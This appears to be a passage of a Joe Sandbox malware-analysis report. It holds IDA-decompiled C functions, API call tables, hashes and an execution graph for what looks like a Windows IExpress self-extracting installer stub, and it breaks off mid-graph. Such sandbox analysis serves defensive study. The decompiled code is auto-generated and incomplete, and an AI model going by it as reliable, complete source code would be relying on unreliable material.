                                                                                                                                                                                                    0x00174855
                                                                                                                                                                                                    0x00174857
                                                                                                                                                                                                    0x00174858
                                                                                                                                                                                                    0x00174860
                                                                                                                                                                                                    0x00174865
                                                                                                                                                                                                    0x0017486a
                                                                                                                                                                                                    0x0017486f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174876
                                                                                                                                                                                                    0x00174831
                                                                                                                                                                                                    0x00174841
                                                                                                                                                                                                    0x00174847
                                                                                                                                                                                                    0x0017480b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017480b
                                                                                                                                                                                                    0x001747f6
                                                                                                                                                                                                    0x00174806
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00174E6F), ref: 001747EA
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00174823
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00174847
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00174851
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                    • API String ID: 359063898-2312194364
                                                                                                                                                                                                    • Opcode ID: 75c61288233b25aa0aed7c061391d7cafa7e163cafe152b6a21516098911f9ae
                                                                                                                                                                                                    • Instruction ID: 35f8f0e5039c221ae616e6179a40defd10eac9fb8420a6cdcae87a8c547cab9d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75c61288233b25aa0aed7c061391d7cafa7e163cafe152b6a21516098911f9ae
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC1125B52446416FE7189F649C18F763B7AEBC5310B14C519FA8A8B741DB358C86C660
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E00176517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                    				struct HRSRC__* _t6;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                                                                                    				int _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t23 =  *0x179a3c; // 0x170000
                                                                                                                                                                                                    				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					E001744B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t24 = _a16;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                    							_push(_a12);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                    						FreeResource(_t21);
                                                                                                                                                                                                    						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t24;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x0017651f
                                                                                                                                                                                                    0x0017652a
                                                                                                                                                                                                    0x00176534
                                                                                                                                                                                                    0x0017656b
                                                                                                                                                                                                    0x00176577
                                                                                                                                                                                                    0x0017657c
                                                                                                                                                                                                    0x00176536
                                                                                                                                                                                                    0x0017653e
                                                                                                                                                                                                    0x00176542
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176544
                                                                                                                                                                                                    0x00176547
                                                                                                                                                                                                    0x0017654c
                                                                                                                                                                                                    0x00176549
                                                                                                                                                                                                    0x00176549
                                                                                                                                                                                                    0x00176549
                                                                                                                                                                                                    0x0017655e
                                                                                                                                                                                                    0x00176560
                                                                                                                                                                                                    0x00176569
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176569
                                                                                                                                                                                                    0x00176542
                                                                                                                                                                                                    0x00176587

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00170000,000007D6,00000005), ref: 0017652A
                                                                                                                                                                                                    • LoadResource.KERNEL32(00170000,00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00176538
                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00170000,00000000,00000547,001719E0,00000000), ref: 00176557
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00176560
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1214682469-0
                                                                                                                                                                                                    • Opcode ID: ac37d8fdfe285fdcf0d459996bf25cbae071c3a1c3e6bee794674481cf29de73
                                                                                                                                                                                                    • Instruction ID: 92b5efcf7cd274a0d4c4277d539c790f334fe68eb2fcfda1f108ba0b5c99661f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac37d8fdfe285fdcf0d459996bf25cbae071c3a1c3e6bee794674481cf29de73
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE012672200A05BBDB105F69AC08DBB7A7CEFC97A1F444125FE0893190D7718C90EAA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00173680(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct tagMSG _v36;
                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                                                    				_t16 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							if(_v36.message != 0x12) {
                                                                                                                                                                                                    								DispatchMessageA( &_v36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t16 = 1;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                    						} while (_t8 != 0);
                                                                                                                                                                                                    						if(_t16 == 0) {
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x0017368c
                                                                                                                                                                                                    0x0017368f
                                                                                                                                                                                                    0x00173691
                                                                                                                                                                                                    0x0017369f
                                                                                                                                                                                                    0x001736a7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001736ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001736bc
                                                                                                                                                                                                    0x001736bc
                                                                                                                                                                                                    0x001736c0
                                                                                                                                                                                                    0x001736cb
                                                                                                                                                                                                    0x001736c2
                                                                                                                                                                                                    0x001736c4
                                                                                                                                                                                                    0x001736c4
                                                                                                                                                                                                    0x001736da
                                                                                                                                                                                                    0x001736e0
                                                                                                                                                                                                    0x001736e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001736e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001736ba
                                                                                                                                                                                                    0x001736ed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0017369F
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001736B2
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 001736CB
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001736DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                    • Opcode ID: ef735e7fe516d0a518ef5e4686a03ff47d186475c6326f8c63b6744652eabe67
                                                                                                                                                                                                    • Instruction ID: 66a462d6b46c0ea7c96fdb8bebc132f52226f2ac1d4c8015741ed92f8a94a665
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef735e7fe516d0a518ef5e4686a03ff47d186475c6326f8c63b6744652eabe67
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 800184729002547BDB304AA65C48EEF767CEBC5B11F50411DB919E2180D6608680D660
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                    			E001765E8(char* __ecx) {
                                                                                                                                                                                                    				char _t3;
                                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                    				char* _t14;
                                                                                                                                                                                                    				char* _t15;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t12 = __ecx;
                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                    				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t3 =  *_t12;
                                                                                                                                                                                                    					_t12 =  &(_t12[1]);
                                                                                                                                                                                                    				} while (_t3 != 0);
                                                                                                                                                                                                    				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                    					if(_t16 <= _t15) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *_t16 == 0x5c) {
                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                    						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t16 = _t10;
                                                                                                                                                                                                    						_t10 = 1;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(_t16);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return _t10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *_t16 == 0x5c) {
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x001765e8
                                                                                                                                                                                                    0x001765ed
                                                                                                                                                                                                    0x001765ef
                                                                                                                                                                                                    0x001765f2
                                                                                                                                                                                                    0x001765f4
                                                                                                                                                                                                    0x001765f4
                                                                                                                                                                                                    0x001765f6
                                                                                                                                                                                                    0x001765f7
                                                                                                                                                                                                    0x00176608
                                                                                                                                                                                                    0x00176611
                                                                                                                                                                                                    0x00176618
                                                                                                                                                                                                    0x0017661c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017660e
                                                                                                                                                                                                    0x00176623
                                                                                                                                                                                                    0x00176625
                                                                                                                                                                                                    0x0017663b
                                                                                                                                                                                                    0x0017663b
                                                                                                                                                                                                    0x0017663d
                                                                                                                                                                                                    0x00176641
                                                                                                                                                                                                    0x00176610
                                                                                                                                                                                                    0x00176610
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176610
                                                                                                                                                                                                    0x00176644
                                                                                                                                                                                                    0x00176647
                                                                                                                                                                                                    0x00176647
                                                                                                                                                                                                    0x00176621
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00172B33), ref: 00176602
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00176612
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00176629
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00176635
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                    • Opcode ID: 256665d42286f29eb8ae50ab837e03becefeadc6c82410935490cda8d53cdcbb
                                                                                                                                                                                                    • Instruction ID: 48379ef267d601941acf543064745720a89f9b77e0085cc9e4692dd50ffa6231
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 256665d42286f29eb8ae50ab837e03becefeadc6c82410935490cda8d53cdcbb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F028320089506EE7321B398C88DBBBFBDCFCB355BA941BFF59D82401D7150D868661
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001769B0() {
                                                                                                                                                                                                    				intOrPtr* _t4;
                                                                                                                                                                                                    				intOrPtr* _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				 *0x1781f8 = E00176C70();
                                                                                                                                                                                                    				__set_app_type(E00176FBE(2));
                                                                                                                                                                                                    				 *0x1788a4 =  *0x1788a4 | 0xffffffff;
                                                                                                                                                                                                    				 *0x1788a8 =  *0x1788a8 | 0xffffffff;
                                                                                                                                                                                                    				_t4 = __p__fmode();
                                                                                                                                                                                                    				_t11 =  *0x178528; // 0x0
                                                                                                                                                                                                    				 *_t4 = _t11;
                                                                                                                                                                                                    				_t5 = __p__commode();
                                                                                                                                                                                                    				_t12 =  *0x17851c; // 0x0
                                                                                                                                                                                                    				 *_t5 = _t12;
                                                                                                                                                                                                    				_t6 = E00177000();
                                                                                                                                                                                                    				if( *0x178000 == 0) {
                                                                                                                                                                                                    					__setusermatherr(E00177000);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E001771EF(_t6);
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x001769b7
                                                                                                                                                                                                    0x001769c2
                                                                                                                                                                                                    0x001769c8
                                                                                                                                                                                                    0x001769cf
                                                                                                                                                                                                    0x001769d8
                                                                                                                                                                                                    0x001769de
                                                                                                                                                                                                    0x001769e4
                                                                                                                                                                                                    0x001769e6
                                                                                                                                                                                                    0x001769ec
                                                                                                                                                                                                    0x001769f2
                                                                                                                                                                                                    0x001769f4
                                                                                                                                                                                                    0x00176a00
                                                                                                                                                                                                    0x00176a07
                                                                                                                                                                                                    0x00176a0d
                                                                                                                                                                                                    0x00176a0e
                                                                                                                                                                                                    0x00176a15

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00176FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00176FC5
                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 001769C2
                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 001769D8
                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 001769E6
                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 00176A07
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                    • Opcode ID: 7c8ac69f893bacfb33e105247402c7cfdce869b2cf3138ebd89ed129af117d76
                                                                                                                                                                                                    • Instruction ID: 7f265ab22a6d40245d0f40a1d8e6109acbac09403d2b494076d2d034ee3f0c4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c8ac69f893bacfb33e105247402c7cfdce869b2cf3138ebd89ed129af117d76
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19F01C705483018FD715AB30ED0E6083B71FB55331B508609F46E86AF1CF3A85C1CB12
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:28.7%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                    Total number of Nodes:962
                                                                                                                                                                                                    Total number of Limit Nodes:25
                                                                                                                                                                                                    execution_graph 3119 397270 _except_handler4_common 3120 3969b0 3121 3969b5 3120->3121 3129 396fbe GetModuleHandleW 3121->3129 3123 3969c1 __set_app_type __p__fmode __p__commode 3124 3969f9 3123->3124 3125 396a0e 3124->3125 3126 396a02 __setusermatherr 3124->3126 3131 3971ef _controlfp 3125->3131 3126->3125 3128 396a13 3130 396fcf 3129->3130 3130->3123 3131->3128 3132 3934f0 3133 393504 3132->3133 3134 3935b8 3132->3134 3133->3134 3136 39351b 3133->3136 3137 3935be GetDesktopWindow 3133->3137 3135 393526 3134->3135 3138 393671 EndDialog 3134->3138 3140 39354f 3136->3140 3141 39351f 3136->3141 3154 3943d0 6 API calls 3137->3154 3138->3135 3140->3135 3144 393559 ResetEvent 3140->3144 3141->3135 3143 39352d TerminateThread EndDialog 3141->3143 3143->3135 3145 3944b9 20 API calls 3144->3145 3148 393581 3145->3148 3146 39361d SetWindowTextA CreateThread 3146->3135 3149 393646 3146->3149 3147 3935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3147->3146 3150 39359b SetEvent 3148->3150 3152 39358a SetEvent 3148->3152 3151 3944b9 20 API calls 3149->3151 3153 393680 4 API calls 3150->3153 3151->3134 3152->3135 3153->3134 3155 394463 SetWindowPos 3154->3155 3157 396ce0 4 API calls 3155->3157 3158 3935d6 3157->3158 3158->3146 3158->3147 3159 396ef0 3160 396f2d 3159->3160 3162 396f02 3159->3162 3161 396f27 ?terminate@ 3161->3160 3162->3160 3162->3161 3163 396bef _XcptFilter 2196 394ca0 GlobalAlloc 2197 396a60 2214 397155 2197->2214 2199 396a65 2200 396a76 GetStartupInfoW 2199->2200 2201 396a93 2200->2201 2202 396aa8 2201->2202 2203 396aaf Sleep 2201->2203 2204 396ac7 _amsg_exit 2202->2204 2205 396ad1 2202->2205 2203->2201 2204->2205 2206 396b13 _initterm 2205->2206 2207 396af4 2205->2207 2212 396b2e __IsNonwritableInCurrentImage 2205->2212 2206->2212 2208 396bd6 _ismbblead 2208->2212 2209 396c1e 2209->2207 2211 396c27 _cexit 2209->2211 2211->2207 2212->2208 2212->2209 2213 396bbe exit 2212->2213 2219 392bfb GetVersion 2212->2219 2213->2212 2215 39717a 2214->2215 2216 39717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 3971e2 2215->2217 2218 3971cd 2216->2218 2217->2199 2218->2217 2220 392c0f 2219->2220 2221 392c50 2219->2221 2220->2221 2222 392c13 GetModuleHandleW 2220->2222 2236 392caa memset memset memset 2221->2236 2222->2221 2225 392c22 GetProcAddress 2222->2225 2225->2221 2233 392c34 2225->2233 2226 392c8e 2228 392c9e 2226->2228 2229 392c97 CloseHandle 2226->2229 2228->2212 2229->2228 2233->2221 2234 392c89 2330 391f90 2234->2330 2347 39468f FindResourceA SizeofResource 2236->2347 2239 392ef3 2241 3944b9 20 API calls 2239->2241 2240 392d2d CreateEventA SetEvent 2242 39468f 7 API calls 2240->2242 2243 392d6e 2241->2243 2244 392d57 2242->2244 2352 396ce0 2243->2352 2245 392d5b 2244->2245 2247 392e1f 2244->2247 2250 39468f 7 API calls 2244->2250 2357 3944b9 2245->2357 2386 395c9e 2247->2386 2253 392d9f 2250->2253 2251 392c62 2251->2226 2277 392f1d 2251->2277 2253->2245 2256 392da3 CreateMutexA 2253->2256 2254 392e3a 2257 392e43 2254->2257 2258 392e52 FindResourceA 2254->2258 2255 392e30 2255->2239 2256->2247 2259 392dbd GetLastError 2256->2259 2412 392390 2257->2412 2262 392e6e 2258->2262 2263 392e64 LoadResource 2258->2263 2259->2247 2261 392dca 2259->2261 2265 392dea 2261->2265 2266 392dd5 2261->2266 2264 392e4d 2262->2264 2427 3936ee GetVersionExA 2262->2427 2263->2262 2264->2243 2268 3944b9 20 API calls 2265->2268 2267 3944b9 20 API calls 2266->2267 2270 392de8 2267->2270 2271 392dff 2268->2271 2272 392e04 CloseHandle 2270->2272 2271->2247 2271->2272 2272->2243 2278 392f6c 2277->2278 2279 392f3f 2277->2279 2571 395164 2278->2571 2281 392f5f 2279->2281 2552 3951e5 2279->2552 2699 393a3f 2281->2699 2284 392f71 2313 39303c 2284->2313 2584 3955a0 2284->2584 2288 396ce0 4 API calls 2290 392c6b 2288->2290 2317 3952b6 2290->2317 2291 392f86 GetSystemDirectoryA 2292 39658a CharPrevA 2291->2292 2293 392fab LoadLibraryA 2292->2293 2294 392fc0 GetProcAddress 2293->2294 2295 392ff7 FreeLibrary 2293->2295 2294->2295 2296 392fd6 DecryptFileA 2294->2296 2297 393017 SetCurrentDirectoryA 2295->2297 2298 393006 2295->2298 2296->2295 2305 392ff0 2296->2305 2299 393054 2297->2299 2300 393026 2297->2300 2298->2297 2632 39621e GetWindowsDirectoryA 2298->2632 2302 393061 2299->2302 2642 393b26 2299->2642 2304 3944b9 20 API calls 2300->2304 2310 39307a 2302->2310 2302->2313 2651 39256d 2302->2651 2308 393037 2304->2308 2305->2295 2718 396285 GetLastError 2308->2718 2311 393098 2310->2311 2662 393ba2 2310->2662 2311->2313 2314 3930af 2311->2314 2313->2288 2720 394169 2314->2720 2318 3952d6 2317->2318 2327 395316 2317->2327 2319 395300 LocalFree LocalFree 2318->2319 2321 3952eb SetFileAttributesA DeleteFileA 2318->2321 2319->2318 2319->2327 2320 39538c 2323 396ce0 4 API calls 2320->2323 2321->2319 2322 395374 2322->2320 3050 391fe1 2322->3050 2325 392c72 2323->2325 2325->2226 2325->2234 2326 39535e SetCurrentDirectoryA 2328 392390 13 API calls 2326->2328 2327->2322 2327->2326 2329 3965e8 4 API calls 2327->2329 2328->2322 2329->2326 2331 391f9a 2330->2331 2332 391f9f 2330->2332 2333 391ea7 15 API calls 2331->2333 2334 3944b9 20 API calls 2332->2334 2337 391fd9 2332->2337 2338 391fc0 2332->2338 2333->2332 2334->2338 2335 391ee2 GetCurrentProcess OpenProcessToken 2340 391f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2335->2340 2342 391f0e 2335->2342 2336 391fcf ExitWindowsEx 2336->2337 2337->2226 2338->2335 2338->2336 2338->2337 2341 391f6b ExitWindowsEx 2340->2341 2340->2342 2341->2342 2343 391f1f 2341->2343 2344 3944b9 20 API calls 2342->2344 2345 396ce0 4 API calls 2343->2345 2344->2343 2346 391f8c 2345->2346 2346->2226 2348 392d1a 2347->2348 2349 3946b6 2347->2349 2348->2239 2348->2240 2349->2348 2350 3946be FindResourceA LoadResource LockResource 2349->2350 2350->2348 2351 3946df memcpy_s FreeResource 2350->2351 2351->2348 2353 396ce8 2352->2353 2354 396ceb 2352->2354 2353->2251 2469 396cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 396e26 2356->2251 2358 3944fe LoadStringA 2357->2358 2361 39455a 2357->2361 2359 394562 2358->2359 2360 394527 2358->2360 2366 3945c9 2359->2366 2372 39457e 2359->2372 2362 39681f 10 API calls 2360->2362 2363 396ce0 4 API calls 2361->2363 2364 39452c 2362->2364 2365 394689 2363->2365 2367 394536 MessageBoxA 2364->2367 2482 3967c9 2364->2482 2365->2243 2369 3945cd LocalAlloc 2366->2369 2370 394607 LocalAlloc 2366->2370 2367->2361 2369->2361 2376 3945f3 2369->2376 2370->2361 2380 3945c4 2370->2380 2372->2372 2375 394596 LocalAlloc 2372->2375 2374 39462d MessageBeep 2470 39681f 2374->2470 2375->2361 2378 3945af 2375->2378 2379 39171e _vsnprintf 2376->2379 2488 